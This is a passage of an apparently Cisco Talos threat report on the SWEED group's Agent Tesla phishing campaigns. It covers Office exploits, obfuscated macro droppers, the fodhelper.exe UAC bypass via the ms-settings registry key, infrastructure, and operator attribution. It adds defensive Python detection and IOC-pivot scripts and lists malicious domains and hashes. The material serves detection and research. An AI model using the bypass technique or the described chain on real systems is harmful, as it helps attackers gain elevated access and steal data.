Interestingly, only a few months prior to these campaigns, a HackForums user with the account name "Sweed" actively sought out a Java crypter; we'll get to that activity later.

## April 2018: Office exploit (CVE-2017-8759)

In April 2018, SWEED began making use of a previously disclosed Office exploit. One of the documents featured in these email campaigns was notable because it was a PowerPoint slideshow (PPSX). Code contained inside one of the slides triggers an exploit for [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), a remote code execution vulnerability in the Microsoft .NET Framework's handling of SOAP WSDL definitions.

[](<https://1.bp.blogspot.com/-ButlTdkctLU/XSx47Vbm1HI/AAAAAAAABO8/fQdbIb4P7rUQoBYzALPbtxGb7pZaee8gQCLcBGAs/s1600/image20.png>)

You can see the execution of external content hosted on the attacker-controlled web server using the file name "chuks.png". As expected, the PNG is not actually an image. Instead, it is a SOAP WSDL definition in XML, as seen in the screenshot below:

[](<https://1.bp.blogspot.com/-KCgLbpK-I4Y/XSx5Cb3ofxI/AAAAAAAABPE/deEpu6woWsEmRDX41z9ps5EgTTOkhrTSgCLcBGAs/s1600/image22.png>)

The purpose of this code is to decode a URL and download a PE32 executable hosted on an attacker-controlled web server. The resulting executable is a packed version of Agent Tesla.

## May 2018: Office exploit (CVE-2017-11882)

In May 2018, campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a remote code execution bug in the legacy Equation Editor component (EQNEDT32.EXE) that is commonly leveraged in malicious documents used for commodity malware distribution.
We can see how the exploit abuses the Equation Editor when executing the sample in [ThreatGrid](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>):

[](<https://1.bp.blogspot.com/-rqu_XQHATkU/XSx5HQU7knI/AAAAAAAABPM/mdIn629s7Hkj8ohFeqCDX-IJksYTBJ1DgCLcBGAs/s1600/image6.png>)

As seen below, the malicious document is designed to appear as if it is an invoice.

[](<https://1.bp.blogspot.com/-9Lfu-Hmvhc0/XSx5RGFN7lI/AAAAAAAABPU/BMMKWanPJhsgXGSeRuLE9ajHKXJWoKhFwCLcBGAs/s1600/image17.png>)

Consistent with previous campaigns, the purpose of this malicious document is to download and execute a packed version of Agent Tesla.

## 2019: Office macros and AutoIT droppers

Beginning in 2019, the campaigns associated with SWEED began leveraging malicious Office macros. As with previous attacks, they rely on spear-phishing emails and malicious attachments to initiate the infection process.

[](<https://1.bp.blogspot.com/-bQPgXJQaOdg/XSx5XIHLMfI/AAAAAAAABPc/H5c7yDGbZnoBp81XkqzwfYlr-P6Chxe7gCLcBGAs/s1600/image27.png>)

The attached XLS contains an obfuscated VBA macro, which executes a PowerShell script through a WMI call (so the PowerShell process is spawned by the WMI provider host rather than directly by Excel). The PowerShell script is also obfuscated using XOR operations to hide its code. Once decoded, it reveals embedded .NET code.

[](<https://1.bp.blogspot.com/-c6ZX94eFuqI/XSx5d5pE4JI/AAAAAAAABPk/ZrhHd5vFBlMYoa5x9FRBZeuAio2sR5e1ACLcBGAs/s1600/image15.png>)

This .NET code is responsible for performing some checks and downloading another executable file. The obfuscation scheme used in this code is the same as the one used in the PowerShell described above. The downloaded file is then saved and executed.

[](<https://1.bp.blogspot.com/-6qVpGRO-ux4/XSx5j5Bh8HI/AAAAAAAABPs/o1B4uJ62tbwLq5tk3NdL7VBYxsumRUIBgCLcBGAs/s1600/image16.png>)

_Call graph after WMI execution._

The downloaded binary is an AutoIT-compiled script.
The script has a lot of junk code designed to make analysis more difficult and time-consuming.

[](<https://1.bp.blogspot.com/-kYLwnGOOZig/XSx5sVAjTII/AAAAAAAABPw/FTPWLZ2i0v0jnBvrU7sR3wdT3iLR6rxXACLcBGAs/s1600/image4.png>)

_Extracted AutoIT script_.

The strings and some of the commands contained in the AutoIT script have been obfuscated using XOR operations, as described below.

[](<https://1.bp.blogspot.com/-Kf7HoJZ6aH0/XSx50BD08rI/AAAAAAAABP8/89e6-bQxt_ktyak6IIVTLT34jRSZpSr-gCLcBGAs/s1600/image5.png>)

The decoder receives two hex strings: the first is the string to deobfuscate, while the second determines the number of rounds of the XOR operation. Each character is XORed against the length of the second parameter, and the pass is repeated a number of times derived from that length and the character position. If the length value is one, the operation runs twice with the same key; since XORing twice with the same key is the identity, the result is the plaintext hex string.

After performing environment checks, the malware reconstructs the assembly code, which is obfuscated in a hex string. Using AutoIt's Dll* family of functions, the code is loaded into the current process's address space.

[](<https://1.bp.blogspot.com/-ZFbG9POWDNE/XSx59SN17CI/AAAAAAAABQE/IovTMl2-Zo86q2kvzwGRIMKZVcBckylrQCLcBGAs/s1600/image1.png>)

_Memory allocation_

Finally, the malware executes the assembly code with two arguments. The first argument is the path of an executable. The assembly creates a process from that executable and injects the payload into it.

[](<https://1.bp.blogspot.com/-d7phxrHgB4Y/XSx6HNelrwI/AAAAAAAABQI/ydJzAtVsnsYiobQHQN7p4A4YCb0Ny_XugCLcBGAs/s1600/image21.png>)

As expected, the final payload in this campaign is another packed version of Agent Tesla.
[](<https://1.bp.blogspot.com/-P1Zs_-tFHmU/XSx6L3-WsXI/AAAAAAAABQM/VrTRIPvDsdUl9LPzReWzfso8qiuYL2-cgCLcBGAs/s1600/image13.jpg>)

## UAC bypass

One of the common characteristics of several of the campaigns associated with SWEED is the use of various techniques to bypass User Account Control (UAC) on infected systems. An example is present in the campaigns observed in 2019. When the malware is first executed on a system, it launches "fodhelper.exe", a Windows binary that auto-elevates and runs at high integrity. Prior to executing it, the malware sets the following registry key:

    HKCU\Software\Classes\ms-settings\shell\open\command

This registry key points to the location of the malicious executable:

[](<https://1.bp.blogspot.com/-3Z3aByr5iz4/XSx6cWarvJI/AAAAAAAABQY/r8kMm29zPmQ6edJhyh_vHwqi-UdfpGscgCLcBGAs/s1600/image28.png>)

"fodhelper.exe" consults this key, and its value is executed as administrator whenever fodhelper.exe runs. This is a UAC bypass, not a privilege escalation vulnerability: the user must already hold administrative rights on the system, and the technique only avoids displaying a UAC prompt to the user. The second instance of the malware is then executed with administrative access to the infected system.

## SWEED infrastructure

The various distribution campaigns linked to SWEED use a limited amount of distribution and C2 infrastructure, with the same servers reused across many different campaigns over long periods of time.
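Two steps in the chain described above leave distinctive host telemetry: a macro that launches PowerShell through WMI gives the PowerShell process WmiPrvSE.exe as its parent rather than EXCEL.EXE, and the fodhelper.exe bypass writes HKCU\Software\Classes\ms-settings\shell\open\command shortly before fodhelper.exe spawns the malware a second time. The following Python detector is an added example, not Talos code: it runs both rules over Sysmon-style process-creation (Event ID 1) and registry-set (Event ID 13) records and correlates the registry write with the later fodhelper.exe child. The events, paths and SID are constructed for the test; the five-minute correlation window is an assumption.

```python
"""Host-side detection of two steps in the SWEED chain: PowerShell launched through WMI by
an Office macro, and the fodhelper.exe UAC bypass keyed on the ms-settings handler.
Added example over constructed Sysmon-style events; not Cisco Talos code."""
import re
from datetime import datetime, timedelta

# Sysmon Event ID 13 reports HKCU keys under HKU\<SID>\..., so match only the key's tail.
MS_SETTINGS_CMD = re.compile(
    r"\\Software\\Classes\\ms-settings\\shell\\open\\command", re.IGNORECASE)
WINDOW = timedelta(minutes=5)   # assumed: how long a key write stays live for correlation


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (severity, rule, evidence) tuples. Event dicts: id 1 = process create
    (image, parent, cmdline); id 13 = registry value set (image, target, details)."""
    alerts, key_writes = [], []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["id"] == 13 and MS_SETTINGS_CMD.search(e["target"]):
            key_writes.append(e)
            alerts.append(("medium", "ms-settings shell\\open\\command written",
                           f'{basename(e["image"])} -> {e["details"]}'))
        elif e["id"] == 1:
            image, parent = basename(e["image"]), basename(e["parent"])
            # Win32_Process.Create from a macro makes WmiPrvSE.exe, not EXCEL.EXE, the parent.
            if image in ("powershell.exe", "pwsh.exe") and parent == "wmiprvse.exe":
                alerts.append(("high", "PowerShell spawned via WMI (macro pattern)", e["cmdline"]))
            # fodhelper.exe auto-elevates; a child that matches a recently written
            # ms-settings command value is the bypass firing.
            if parent == "fodhelper.exe":
                recent = [w for w in key_writes
                          if timedelta(0) <= e["ts"] - w["ts"] <= WINDOW
                          and basename(w["details"]) == image]
                if recent:
                    alerts.append(("high",
                                   "fodhelper.exe child matches hijacked ms-settings handler (UAC bypass)",
                                   e["image"]))
    return alerts


# Constructed events mirroring the chain in the post (paths and SID are made up).
T0 = datetime(2019, 6, 3, 9, 14, 0)
DROPPER = r"C:\Users\victim\AppData\Roaming\stage2.exe"
SAMPLE_EVENTS = [
    {"ts": T0, "id": 1, "image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "parent": r"C:\Windows\explorer.exe", "cmdline": '"EXCEL.EXE" invoice.xls'},
    {"ts": T0 + timedelta(seconds=5), "id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgA..."},
    {"ts": T0 + timedelta(seconds=40), "id": 13, "image": DROPPER,
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings\shell\open\command\(Default)",
     "details": DROPPER},
    {"ts": T0 + timedelta(seconds=41), "id": 1, "image": r"C:\Windows\System32\fodhelper.exe",
     "parent": DROPPER, "cmdline": "fodhelper.exe"},
    {"ts": T0 + timedelta(seconds=42), "id": 1, "image": DROPPER,
     "parent": r"C:\Windows\System32\fodhelper.exe", "cmdline": DROPPER},
    {"ts": T0 + timedelta(seconds=90), "id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for severity, rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{severity:6}] {rule}: {evidence}")
```

The registry write alone is rated medium because legitimate software never needs that key but a lone write could be a test or a half-finished attempt; the high-confidence signal is the fodhelper.exe child whose image matches the value just written, which is the bypass actually running.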
The majority of the registrants associated with the domains used by SWEED list the following email addresses:

    aaras480@gmail[.]com
    sweed.[redacted]@gmail[.]com

The registrant contact information used to register most of the domains is also consistent:

[image](<https://1.bp.blogspot.com/-PeOGdJl28kg/XSx6llV7raI/AAAAAAAABQc/MHshudMMmtsNBok-nvAcLkWhiL2r2RtagCLcBGAs/s1600/image9.png>)

In April 2018, a security researcher published a [screenshot](<https://twitter.com/mrglaive/status/987780707551469569>) of an RDP server believed to have been actively leveraged by SWEED (84.38.134[.]121):

[image](<https://1.bp.blogspot.com/-3BeFHcPnORw/XSx6s-YzFRI/AAAAAAAABQg/QUT0mNw0LE0hcP1E4wTDzAhU7-uX0FV9ACLcBGAs/s1600/image19.png>)

In the screenshot above, the list of user accounts established on the RDP server can be seen, which includes an account named "sweed." The fact that multiple users are active at the same time indicates that this server is being used in a multi-user capacity and provides a platform on which members of SWEED can work collaboratively. This also likely indicates a business relationship between multiple individuals responsible for these ongoing malware distribution campaigns.

We also identified several DDNS domains that were being used to facilitate connectivity to the shared RDP server and that feature many of the same values as the RDP user accounts:

* _sweedoffice[.]duckdns[.]org_
* _sweedoffice-**olamide**[.]duckdns[.]org_
* _sweedoffice-**chuks**[.]duckdns[.]org_
* _www.sweedoffice-**kc**.duckdns[.]org_
* _sweedoffice-**kc**.duckdns[.]org_
* _sweedoffice-**goodman**.duckdns[.]org_
* _sweedoffice-**bosskobi**.duckdns[.]org_
* _www.sweedoffice-**olamide**.duckdns[.]org_
* _www.sweedoffice-**chuks**.duckdns[.]org_

During our analysis of various campaigns associated with SWEED, we identified several common elements that also reflect the distinct values associated with users of the RDP server.
In many cases, the distribution servers used to host the malicious PE32 binaries distributed by SWEED contained a directory structure consisting of multiple directories, each holding the binaries being distributed. In many cases, the binary file names, as well as the directory names used to host the malicious content, reflected the same users present on the RDP server.

For example, in June 2019, the following URLs were hosting malicious content associated with these campaigns:

* _hxxp://aelna[.]com/file/**chuks**.exe_
* _hxxp://aelna[.]com/file/**sweed**.exe_
* _hxxp://aelna[.]com/file/**duke**.exe_

Likewise, when investigating samples associated with known domains used to exfiltrate sensitive information from infected systems, we see the following binary file names being used repeatedly across campaigns over a long period of time:

* _dadi.exe_
* _kelly.exe_
* _chuks.exe_
* _olamide.exe_
* _sweed.exe_
* _kc.exe_
* _hero.exe_
* _goodman.exe_
* _duke.exe_
* _hipkid.exe_

In several cases, the directory structure present on the distribution servers contained multiple directories hosting malicious files. An example listing, using the domain sodismodisfrance[.]cf, is below:

* _sodimodisfrance[.]cf/2/**chuks**.exe_
* _sodimodisfrance[.]cf/6/**chuks**.exe_
* _sodimodisfrance[.]cf/5/**goodman**.exe_
* _sodimodisfrance[.]cf/1/**chuks**.exe_
* _sodimodisfrance[.]cf/1/**hipkid**.exe_
* _sodimodisfrance[.]cf/5/**sweed**.exe_
* _sodimodisfrance[.]cf/2/**duke.boys**.exe_

These appear to match the handles used by actors known to be associated with SWEED. Another known domain used to exfiltrate sensitive information collected by Agent Tesla is sweeddehacklord[.]us. Analysis of known malware seen communicating with this domain shows similar patterns of operation.
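The naming overlap between the DDNS hostnames, the distribution URLs and the binary names above is the kind of pivot an analyst scripts rather than eyeballs. The following is an added example (our code, not Talos tooling) that takes the defanged indicators quoted in the text, refangs them, pulls the handle out of each of the two naming patterns the post describes (`sweedoffice-<handle>.duckdns.org` hostnames and `<handle>.exe` file names on the distribution servers), and reports which handles recur across artefact types. The regular expressions are our assumption about those patterns, and the indicator list is the subset quoted above.

```python
"""Pivoting on operator handles embedded in SWEED infrastructure.

Added example (not Talos tooling). The indicators are the defanged values
quoted in the post; the naming patterns are our assumption.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Defanged indicators copied from the post.
DEFANGED_IOCS = [
    "sweedoffice[.]duckdns[.]org",
    "sweedoffice-olamide[.]duckdns[.]org",
    "sweedoffice-chuks[.]duckdns[.]org",
    "www.sweedoffice-kc.duckdns[.]org",
    "sweedoffice-goodman.duckdns[.]org",
    "sweedoffice-bosskobi.duckdns[.]org",
    "hxxp://aelna[.]com/file/chuks.exe",
    "hxxp://aelna[.]com/file/sweed.exe",
    "hxxp://aelna[.]com/file/duke.exe",
    "sodimodisfrance[.]cf/2/chuks.exe",
    "sodimodisfrance[.]cf/5/goodman.exe",
    "sodimodisfrance[.]cf/1/hipkid.exe",
    "sodimodisfrance[.]cf/2/duke.boys.exe",
]

# Assumed naming patterns: the handle is the DDNS label suffix, or the
# first dotted component of the hosted file name ("duke.boys.exe" -> duke).
DDNS_HANDLE = re.compile(r"^(?:www\.)?sweedoffice-([a-z0-9]+)\.duckdns\.org$")
FILE_HANDLE = re.compile(r"/([a-z0-9]+)(?:\.[a-z0-9]+)*\.exe$")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a parseable one."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


def hostname(ioc: str) -> str:
    # Schemeless URLs need a leading "//" for urlparse to see the host.
    return urlparse(ioc if "://" in ioc else "//" + ioc).hostname


def extract_handles(iocs):
    """Map each handle to the set of (artefact kind, host) it was seen in."""
    seen = defaultdict(set)
    for raw in iocs:
        ioc = refang(raw.lower())
        host = hostname(ioc)
        m = DDNS_HANDLE.match(host)
        if m:
            seen[m.group(1)].add(("ddns_host", host))
        m = FILE_HANDLE.search(ioc)
        if m:
            seen[m.group(1)].add(("file_name", host))
    return dict(seen)


def shared_handles(seen, min_kinds: int = 2):
    """Handles that recur across at least `min_kinds` artefact kinds: the
    strongest links between the RDP users, the DDNS names and the payloads."""
    return sorted(h for h, places in seen.items()
                  if len({kind for kind, _ in places}) >= min_kinds)


if __name__ == "__main__":
    handles = extract_handles(DEFANGED_IOCS)
    for handle in sorted(handles):
        print(handle, sorted(handles[handle]))
    print("cross-artefact handles:", shared_handles(handles))
```

On the quoted subset, `chuks` and `goodman` are the handles seen both as a DDNS label and as a hosted file name; feeding the full IOC list from the end of the post into `DEFANGED_IOCS` widens that set.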
In analyzing the malware activity associated with SWEED, we also investigated the use of interesting paths in the hosting of the administration panels associated with the various RATs and stealers distributed by this group. Indeed, on a single C2 server, we identified several panels at the following URLs:

* _sweed-office.comie[.]ru/**goodman**/panel_
* _sweed-office.comie[.]ru/**kc**/panel/_
* _wlttraco[.]com/sweed-office/**omee**/panel/login.php_
* _wlttraco[.]com/sweed-client/**humble1**/panel/post.php_
* _wlttraco[.]com/sweed-client/**sima**/panel/post.php_
* _wlttraco[.]com/sweed-office/**omee**/panel/post.php_
* _wlttraco[.]com/sweed-office/**kc**/panel/post.php_
* _wlttraco[.]com/sweed-office/**olamide**/panel/post.php_
* _wlttraco[.]com/sweed-office/**jamil**/panel/post.php_
* _wlttraco[.]com/sweed-client/**niggab**/panel/post.php_
* _wlttraco[.]com/sweed-client/**humble2**/panel/post.php_
* _wlttraco[.]com/sweed-office/**harry**/panel/post.php_

Based on our research, as well as the panel-hosting locations, we believe that wiki, olamide, chuks, kc, goodman, bosskobi, dadi, hipkid, and others are SWEED customers or business associates. Using the binary file names, directory structures, and other artifacts, we have been able to identify interesting online behavior and interests exhibited across various hacking forums, IRC servers, etc. that appear to link some of these users with various elements of the malware distribution campaigns.

There are several other domains that can be linked to SWEED and that appear to be associated with various malware families and distribution campaigns. These have also been observed to resolve to the IP associated with the aforementioned RDP server.
* _sweeddehacklord[.]us_
* _sweed-office.comie[.]ru_
* _sweed-viki[.]ru_

### Use of typosquatting

Another interesting element of many of the campaigns associated with SWEED is the use of typosquatting for the domains used to host the packed Agent Tesla binaries that have been distributed over the past few years.

[image](<https://1.bp.blogspot.com/-goK4dJ3zoZI/XSx695KKjYI/AAAAAAAABQs/WoF99-zl9q4RV7WgFUQbZvYEcklFRcDQwCLcBGAs/s1600/image10.jpg>)

_Victims' geographic dispersion._

Looking at the victimology by country, it is clear that there is no geographic focus when choosing targets: SWEED targets companies all over the world.

[image](<https://1.bp.blogspot.com/-62VbjYV0b_E/XSx7G8IOETI/AAAAAAAABQw/ViXCuaMBtioHKcQHzDU_3Ii9SrEcBuKPwCLcBGAs/s1600/image30.jpg>)

_Breakdown of victims' activity by industry._

The breakdown by activity, however, does show a clear tendency toward manufacturing and logistics companies.

Here's a rundown of these domains, along with the companies they are meant to look like and the industry each company is associated with. In some cases, we were unable to determine the targeted organization from the typosquatted domain.

[image](<https://1.bp.blogspot.com/-LvOXntJ5RZE/XSx7QhmQQKI/AAAAAAAABQ4/_g8dFo0Y19kvdpRhbvHNamJQFNlLG-wJQCLcBGAs/s1600/image3.jpg>)

For all of the domains listed above, the registrant account information associated with the domains is consistent with what we have identified as associated with SWEED campaign activity.

## Operational Security (OPSEC)

We identified various behavior on hacking forums, IRC channels, and other websites that appeared consistent with the TTPs we observed from the actor distributing this malware.
### "SWEE D"

During our analysis, we identified a user on HackForums using the moniker "SWEE D." In most of the online posts associated with this user, their contact information was included in the post and listed the Skype address "sweed.[redacted]".

In the months leading up to the January 2018 campaigns, we observed this user posting requests for access to a Java crypter. Typically, crypters are used to help evade antivirus detection, as they "crypt" the contents of the malicious payload being distributed.

[image](<https://1.bp.blogspot.com/-83i7csrTS6k/XSx7lT916jI/AAAAAAAABRE/04B-iRVuMlYMekbBBRCx20TbRXstnqSbQCLcBGAs/s1600/image26.png>)

The same user posted repeatedly in threads related to Java crypters, and even annoyed other users with how often they were posting:

[image](<https://1.bp.blogspot.com/-pEcoYbx16c0/XSx7rQjsf3I/AAAAAAAABRI/BTCnpTi3Vl4UK-TVCRaJFdOwO8GbEvTWgCLcBGAs/s1600/image23.png>)

The same Skype account listed in the HackForums posts was also used by someone using the name "Daniel" in 2016 while commenting on a blog related to the creation of Facebook phishing pages:

[image](<https://1.bp.blogspot.com/-i3MehGGcxsw/XSx7xFcMIyI/AAAAAAAABRM/E72HNia0RYI4RjemxoAnOE4WmUTSSsaigCLcBGAs/s1600/image29.png>)

This same Skype account was also used in 2015 by someone going by the name "[redacted] Daniel."

[image](<https://1.bp.blogspot.com/-O1bQZiICGMQ/XSx73OkDhXI/AAAAAAAABRU/Z6Px4plF2Q48mmatHvbn0XXjh_BdrHpwQCLcBGAs/s1600/image14.png>)

Note: [redacted] is also the name used in the email address associated with the registrant account for the domain wlttraco[.]com (sweed.[redacted]@gmail.com).

We also located screenshots that were [published](<https://twitter.com/sS55752750/status/983260208091852800/photo/1>) on the Twitter account [.sS!.!](<https://twitter.com/sS55752750>) showing the Discord server "Agent Tesla Live", which listed sweed ([redacted] Daniel) as a member of the staff.
[image](<https://1.bp.blogspot.com/-4kNr0-E4lQw/XSx8BtMpnpI/AAAAAAAABRg/jSuJXB-dUhE8NnY26bO3gRCtFP-McBokACLcBGAs/s1600/image34.png>)

It is important to note that the avatar used by this Discord user (SWEE D) is the same avatar used by the Skype user sweed.[redacted].

[image](<https://1.bp.blogspot.com/-YqsT6QRIuv8/XSx8HqNWjoI/AAAAAAAABRo/l-SATXJ0ruAPdc-TSiGFBQE0QNuasi5TwCLcBGAs/s1600/image31.png>)

We contacted SWEE D on Skype and were able to confirm that the same user operates the Discord and Skype accounts:

[image](<https://1.bp.blogspot.com/-vw4K0x-B_9E/XSx8MlnUbZI/AAAAAAAABRs/AnevGM2cGdI7NrGDnWmtL9OCkCDeSOY_QCLcBGAs/s1600/image8.png>)

During our interaction with SWEE D, they mentioned that they are a student studying ethical hacking and that they work in the IT departments of various companies to help remove malware and improve their security.

[image](<https://1.bp.blogspot.com/-TFxzKNzRRC4/XSx8TOrpU8I/AAAAAAAABR0/8Aih7iMc_LQpI92LpON444n1c0WrQMGHACLcBGAs/s1600/image33.png>)

This is contrary to the following activity, observed in an IRC transaction, where a user named "sweed" was submitting credit card information to a bot listening in the channel in an effort to check the validity and usability of presumably stolen credit card information.

[image](<https://1.bp.blogspot.com/-Z53y6IxVzTk/XSx8XzdyYkI/AAAAAAAABR8/q68l0JsloEYX_J-tf1hBHCoJIny4QbNnwCLcBGAs/s1600/image18.png>)

The IRC channel appeared to be created and used solely for this purpose, with a bot named "chkViadex24" returning information related to the credit card that was submitted:

[image](<https://1.bp.blogspot.com/-nCS7I1IW3KI/XSx8de_Ty4I/AAAAAAAABSA/iOy3R96k2TIjkL7XnQ4s-BF1BflZIUICgCLcBGAs/s1600/image25.png>)

This is an example of how stolen credit card information is actively used by adversaries to determine whether or not they can monetize the information once they have stolen it from victims.
It's possible that "SWEE D", "sweed" and [redacted] Daniel are the same person. We also identified the following LinkedIn profile that listed the same name:

[image](<https://1.bp.blogspot.com/-gzQgpDh3zd4/XSx8kzwseGI/AAAAAAAABSI/m3Stbo6tFVs-p54blRsyx3pvvMDlFuyOQCLcBGAs/s1600/image12.png>)

This account lists Nigeria as its location. "[redacted]" is a Nigerian novel. Many of the details we identified during our analysis of "sweed," such as the information in the LinkedIn profile, the references to "[redacted]," the registrant information used, and the location listed in the Skype account, indicate that the individual is likely located in Nigeria. We believe "sweed" is a key member of the group and that the other accounts are likely associated with customers or business partners.

## Conclusion

SWEED has been active for at least three years — and a user with that name has been active on various forums, IRC channels and Discord servers since at least 2015. Currently, SWEED is actively targeting small and medium-sized companies around the world. Based on the TTPs used by this group, SWEED should be considered a relatively amateur actor. They use well-known vulnerabilities, commodity stealers and RATs (Pony, Formbook, UnknownRAT, Agent Tesla, etc.) and appear to rely on kits readily available on hacking forums. SWEED consistently leverages packing and crypting in order to minimize detection by anti-malware solutions. We assess that SWEED also does not have effective operational security, as they used several of the same online accounts for about five years, allowing for the discovery of a lot of their information, operations and associates.

At this time, we cannot say with certainty whether the other accounts and individuals associated with SWEED are business associates or customers.
However, they all use the same infrastructure in a coordinated manner across domains, rely on the same malware and packers, and all operate very similarly. While SWEED is relatively well known in the security research community, this research provides insight into how these cybercriminal organizations operate and evolve over time in an effort to maximize their ability to generate revenue and evade detection. We expect SWEED to continue to operate for the foreseeable future, and we will continue to monitor their activities to ensure that customers remain protected.

## Coverage

Ways our customers can detect and block this threat are listed below.

[image](<https://1.bp.blogspot.com/-5LbEZMzMTPM/XSyEo6LKHoI/AAAAAAAABSY/VQK8MPWAxZYG24sFQA-gkUH2epneacxkgCLcBGAs/s1600/image32.png>)

Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware detailed in this post. The screenshot above shows how AMP can protect customers from this threat. Try AMP for free [here](<http://cisco.com/go/tryamp>).

Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or Web Security Appliance ([WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks.

[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign.
Network security appliances such as Next-Generation Firewall ([NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)), Next-Generation Intrusion Prevention System ([NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products.

[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context for your specific environment and threat data are available from the [Firepower Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>).

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).

## Indicators of Compromise (IOCs)

The following IOCs have been observed as associated with malware campaigns conducted by this group.
### Campaign #1

Java_Updater.zip -> 59b15f6ace090d05ac5f7692ef834433d8504352a7f45e80e7feb05298d9c2dd
P-O of Jun2017.zip -> e397ba1674a6dc470281c0c83acd70fd4d772bf8dcf23bf2c692db6575f6ab08
Agent Tesla -> 8c8f755b427b32e3eb528f5b59805b1532af3f627d690603ac12bf924289f36f

### Campaign #2

Java sample -> d27a29bdb0492b25bf71e536c8a1fae8373a4b57f01ad7481006f6849b246a97

### Campaign #3

New Order For Quotation.ppsx -> 65bdd250aa4b4809edc32faeba2781864a3fee7e53e1f768b35a2bdedbb1243b

### Campaign #4

SETTLEMENT OF OUTSTANDING.xlsx -> 111e1fff673466cedaed8011218a8d65f84bee48d5ce6d7e8f62cb37df75e671

### Campaign #5

Request and specification of our new order.xls -> 1dd4ac4925b58a2833b5c8969e7c5b5ff5ec590b376d520e6c0a114b941e2075
Agent Tesla -> fa6557302758bbea203967e70477336ac7a054b1df5a71d2fb6d822884e4e34f

### Domains

sweeddehacklord[.]us
sweed-office.comie[.]ru
sweed-viki[.]ru
sweedoffice.duckdns[.]org
sweedoffice-olamide.duckdns[.]org
sweedoffice-chuks.duckdns[.]org
www.sweedoffice-kc.duckdns[.]org
sweedoffice-kc.duckdns[.]org
sweedoffice-goodman.duckdns[.]org
sweedoffice-bosskobi.duckdns[.]org
www.sweedoffice-olamide.duckdns[.]org
www.sweedoffice-chuks.duckdns[.]org
aelna[.]com
candqre[.]com
spedaqinterfreight[.]com
worldjaquar[.]com
zurieh[.]com
aiaininsurance[.]com
aidanube[.]com
anernostat[.]com
blssleel[.]com
bwayachtng[.]com
cablsol[.]com
catalanoshpping[.]com
cawus-coskunsu[.]com
crosspoiimeri[.]com
dougiasbarwick[.]com
erieil[.]com
etqworld[.]com
evegreen-shipping[.]com
gufageneys[.]com
hybru[.]com
intermodaishipping[.]net
jltqroup[.]com
jyexports[.]com
kayneslnterconnection[.]com
kn-habour[.]com
leocouriercompany[.]com
lnnovalues[.]com
mglt-mea[.]com
mti-transt[.]com
profbuiiders[.]com
quycarp[.]com
regionaitradeinspections[.]com
repotc[.]com
rsaqencies[.]com
samhwansleel[.]com
serec[.]us
snapqata[.]com
sukrltiv[.]com
supe-lab[.]com
usarmy-mill[.]com
virdtech[.]com
willistoweswatson[.]com
xlnya-cn[.]com
zarpac[.]us
Oralbdentaltreatment[.]tk
wlttraco[.]com

ID TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6 Type talosblog Title SWEED: Exposing years of Agent Tesla campaigns Published 2019-07-16T05:47:33 Modified 2019-07-16T05:47:33 Source <http://feedproxy.google.com/~r/feedburner/Talos/~3/vpuNeB6RXIY/sweed-agent-tesla.html> CVSS 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

---

Type blog Last seen 2017-09-20T10:59:03
